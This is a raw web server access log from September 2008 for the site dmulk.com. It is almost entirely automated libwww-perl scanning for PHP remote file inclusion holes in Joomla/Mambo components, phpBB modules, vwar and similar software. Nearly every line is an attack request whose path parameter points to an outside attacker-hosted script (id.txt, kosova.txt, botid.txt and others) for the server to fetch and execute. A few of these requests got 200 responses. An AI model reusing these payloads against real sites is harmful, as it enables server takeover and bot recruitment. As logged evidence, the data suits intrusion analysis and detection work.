212.72.175.64 - - [22/Sep/2008:09:32:11 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.175.64 - - [22/Sep/2008:09:32:12 -0700] "GET /phphtml.php?htmlclass_path=http://www.temple-ieee.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:32:15 -0700] "GET /logs/access_080628.log//administrator/index.php?option=com_linkdirectory&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:32:25 -0700] "GET /logs/access_080329.log//administrator/index.php?option=com_phpshop&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:32:25 -0700] "GET //administrator/index.php?option=com_phpshop&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:32:25 -0700] "GET /logs//administrator/index.php?option=com_phpshop&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:32:26 -0700] "GET /logs/access_080326.log//administrator/index.php?option=com_mgm&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:32:26 -0700] "GET //administrator/index.php?option=com_mgm&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:32:26 -0700] "GET /logs//administrator/index.php?option=com_mgm&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:32:28 -0700] "GET /logs/access_080215.log//administrator/index.php?option=com_mgm&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:32:32 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:32:32 -0700] "GET ///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:32:33 -0700] "GET /logs///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:32:33 -0700] "GET /logs/access_080218.log//administrator/index.php?option=com_phpshop&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:32:55 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:32:56 -0700] "GET ///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:32:56 -0700] "GET /logs///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:33:01 -0700] "GET /logs/access_080325.log//administrator/index.php?option=com_performs&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:33:02 -0700] "GET //administrator/index.php?option=com_performs&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:33:02 -0700] "GET /logs//administrator/index.php?option=com_performs&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:33:17 -0700] "GET ///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:33:18 -0700] "GET /logs/access_080321.log//administrator/index.php?option=com_videodb&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:33:19 -0700] "GET //administrator/index.php?option=com_videodb&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:33:20 -0700] "GET /logs//administrator/index.php?option=com_videodb&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:33:28 -0700] "GET /logs/access_080310.log//administrator/index.php?option=com_performs&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:33:29 -0700] "GET /index1.php?menu=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:33:29 -0700] "GET /logs/index1.php?menu=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:33:30 -0700] "GET /logs/access_080614.log/index1.php?menu=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:33:30 -0700] "GET /logs/access_080707.log/index1.php?menu=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.59.5.135 - - [22/Sep/2008:09:33:31 -0700] "GET /logs/access_080826.log%20/errors.php?error=http://www.efeyl.org/wiki/backups/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:33:36 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:33:49 -0700] "GET /logs/access.log//errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:33:50 -0700] "GET //errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:33:50 -0700] "GET /logs//errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.122.81.86 - - [22/Sep/2008:09:33:51 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://geocities.com/jticrew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:09:33:53 -0700] "GET /bikes/occcb/?N=A HTTP/1.0" 200 817 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.122.81.86 - - [22/Sep/2008:09:33:56 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://geocities.com/jticrew/id.txt?? HTTP/1.1" 200 95085 "-" "libwww-perl/5.76" "www.dmulk.com"
88.191.59.176 - - [22/Sep/2008:09:33:58 -0700] "GET /logs/access_080611.log//modules/userstop/userstop.php?exbb[home_path]=http://www.hosernews.ca/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:34:12 -0700] "GET /logs/access_080703.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:34:12 -0700] "GET //administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:34:13 -0700] "GET /logs//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.61.170 - - [22/Sep/2008:09:34:20 -0700] "GET /logs/access_080521.log//administrator/index.php?option=com_videodb&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:34:28 -0700] "GET /logs/access_080703.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:34:28 -0700] "GET //administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:34:29 -0700] "GET /logs//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:34:50 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:34:50 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:09:34:50 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:34:51 -0700] "GET /logs/access_080711.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:34:52 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/idv6.txt%0D?? HTTP/1.1" 200 95371 "-" "libwww-perl/5.76" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:09:34:52 -0700] "GET /errors.php?error=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:09:34:54 -0700] "GET /logs/errors.php?error=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:35:00 -0700] "GET /logs/access_080518.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:35:20 -0700] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:35:21 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:35:21 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:35:21 -0700] "GET /logs/access_080826.log/sablonlar/gunaysoft/gunaysoft.php?uzanti=http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:35:22 -0700] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:35:22 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:09:35:22 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:35:22 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:09:35:23 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:09:35:23 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [22/Sep/2008:09:35:26 -0700] "GET /logs/access_080727.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.28.34 - - [22/Sep/2008:09:35:26 -0700] "GET /logs/access_080626.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:09:35:33 -0700] "GET /logs/access_080805.log//errors.php?error=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:35:33 -0700] "GET /logs/access_080518.log//administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:35:36 -0700] "GET /logs/access_080524.log/sablonlar/gunaysoft/gunaysoft.php?uzanti=http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:35:37 -0700] "GET /logs/access_080726.log/index.php?ort=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:35:37 -0700] "GET /logs/index.php?ort=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:35:38 -0700] "GET /index.php?ort=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 200 94766 "-" "libwww-perl/5.805" "www.dmulk.com"
83.160.222.29 - - [22/Sep/2008:09:35:40 -0700] "GET /logs/access_080619.log/index.php?ort=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [22/Sep/2008:09:35:48 -0700] "GET /logs/access_070719.log//inc/functions.inc.php?config[ppa_root_path]=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.27.28.34 - - [22/Sep/2008:09:35:49 -0700] "GET /logs/access_080615.log HTTP/1.1" 200 1245184 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:35:55 -0700] "GET /logs/access_080326.log%20/index1.php?menu=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:35:58 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:36:00 -0700] "GET ///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:36:02 -0700] "GET /logs///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.234.171 - - [22/Sep/2008:09:36:06 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.albchat.biz/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:09:36:09 -0700] "GET /logs/access_080128.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:36:36 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:36:45 -0700] "GET //administrator/index.php?option=com_performs&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.109.250.144 - - [22/Sep/2008:09:36:45 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [22/Sep/2008:09:36:59 -0700] "GET //administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:37:02 -0700] "GET //administrator/index.php?option=com_dbquery&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:37:04 -0700] "GET //includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:37:07 -0700] "GET //administrator/index.php?option=com_linkdirectory&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:37:07 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:37:12 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:09:37:14 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.101.4.49 - - [22/Sep/2008:09:37:15 -0700] "GET /logs/access_080817.log/sablonlar/gunaysoft/gunaysoft.php?uzanti=http://www.syahrulazlan.com/login/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.36.144.8 - - [22/Sep/2008:09:37:22 -0700] "GET /logs/access_080711.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:37:32 -0700] "GET /logs/access_080502.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.64.145 - - [22/Sep/2008:09:37:32 -0700] "GET /logs/access_080502.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:37:36 -0700] "GET /logs/access_080710.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.202.80.82 - - [22/Sep/2008:09:37:40 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.202.80.82 - - [22/Sep/2008:09:37:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.78.135 - - [22/Sep/2008:09:37:48 -0700] "GET /logs/access_080510.log%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.suryamassage.nl/suryamassage/images//stories/food/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:37:51 -0700] "GET //administrator/index.php?option=com_phpshop&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.190.202.150 - - [22/Sep/2008:09:37:56 -0700] "GET //administrator/index.php?option=com_webring&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:38:09 -0700] "GET /logs/access_080219.log//includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:38:12 -0700] "GET //includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:38:12 -0700] "GET /logs//includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.68.79 - - [22/Sep/2008:09:38:16 -0700] "GET //administrator/index.php?option=com_mgm&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [22/Sep/2008:09:38:16 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.141.49 - - [22/Sep/2008:09:38:19 -0700] "GET /logs/access_080127.log//includes/get_header.php?vwar_root=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.116.134 - - [22/Sep/2008:09:38:34 -0700] "GET //admin.php?include_path=http://f3lix.clan.su/idnew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.116.134 - - [22/Sep/2008:09:38:34 -0700] "GET /logs/access_080215.log//admin.php?include_path=http://f3lix.clan.su/idnew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.116.134 - - [22/Sep/2008:09:38:38 -0700] "GET /logs//admin.php?include_path=http://f3lix.clan.su/idnew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.116.134 - - [22/Sep/2008:09:38:51 -0700] "GET /logs/access_080119.log//admin.php?include_path=http://f3lix.clan.su/idnew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:38:54 -0700] "GET /logs//administrator/index.php?option=com_linkdirectory&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [22/Sep/2008:09:38:54 -0700] "GET //administrator/index.php?option=com_linkdirectory&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
